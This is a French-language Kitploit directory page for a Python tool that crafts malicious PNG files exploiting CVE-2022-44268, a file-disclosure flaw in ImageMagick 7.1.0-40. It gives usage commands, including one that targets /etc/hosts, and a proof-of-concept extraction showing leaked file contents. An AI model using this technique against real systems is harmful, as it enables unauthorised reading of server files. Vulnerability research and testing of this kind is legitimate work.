Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2022-44268 — Générateur d'exploit Python pour la vulnérabilité CVE-2022-44268 d'inclusion de fichiers locaux dans ImageMagick. Crée des fichiers PNG malveillants pour lire des fichiers arbitraires sur les systèmes vulnérables. | Kitploit
Outils/GitHubGitHub/pog-frog/cve-2022-44268
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionRed Teaming
GitHubpog-frog/cve-2022-44268

cve-2022-44268

Générateur d'exploit Python pour la vulnérabilité CVE-2022-44268 d'inclusion de fichiers locaux dans ImageMagick. Crée des fichiers PNG malveillants pour lire des fichiers arbitraires sur les systèmes vulnérables.

Voir le dépôt
1il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-44268

ImageMagick est une suite logicielle multiplateforme gratuite et open-source permettant d'afficher, convertir et éditer des images matricielles et vectorielles. Il peut lire et écrire plus de 200 formats de fichiers image. ImageMagick est sous licence Apache 2.0. Il est disponible sous forme d'outils en ligne de commande, ainsi que d'une API C et d'un ensemble de classes C++. Wikipédia

ImageMagick versions 7.1.0-40 et antérieures sont vulnérables à une inclusion locale de fichier (Local File Inclusion). La vulnérabilité est due à une validation incorrecte des entrées fournies par l'utilisateur. Un attaquant peut exploiter cette vulnérabilité en envoyant un fichier PNG spécialement conçu vers la cible. Une exploitation réussie pourrait permettre à un attaquant de lire des fichiers arbitraires sur le système cible.

Crédits aux chercheurs qui ont découvert cela :

  • Bryan Gonzalez et l'équipe Ocelot

Créer un PNG malveillant pour exploiter ImageMagick 7.1.0-40 :

  • CVE-2022-44267 : Déni de service
  • CVE-2022-44268 : Divulgation d'informations

Prérequis

  • Python3
  • PIL (pip install Pillow)

Utilisation

Fabrication d'un PNG avec generate.py :

root@kitploit:~
python3  generate.py -i input.png -f "/etc/hosts" -o exploit.png

     
  ______     __  _____                   ______                
 |  _ \ \   / / |  __ \                 |  ____|               
 | |_) \ \_/ /  | |__) |__   __ _ ______| |__ _ __ ___   __ _  
 |  _ < \   /   |  ___/ _ \ / _` |______|  __| '__/ _ \ / _` | 
 | |_) | | |    | |  | (_) | (_| |      | |  | | | (_) | (_| | 
 |____/  |_|    |_|   \___/ \__, |      |_|  |_|  \___/ \__, | 
                             __/ |                       __/ | 
                            |___/                       |___/  

    

   [*] ImageMagick LFI Exploit
   [*] Embedding Payload to read the target file
   [*] Exploit PNG generated: exploit.png

Preuve de concept (PoC)

root@kitploit:~
python3 extract.py downloaded_img.png
127.0.0.1       localhost
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters

Avertissement : Sois gentil, s'il te plaît, ne l'utilise pas pour de mauvaises actions.

Télécharger l’outil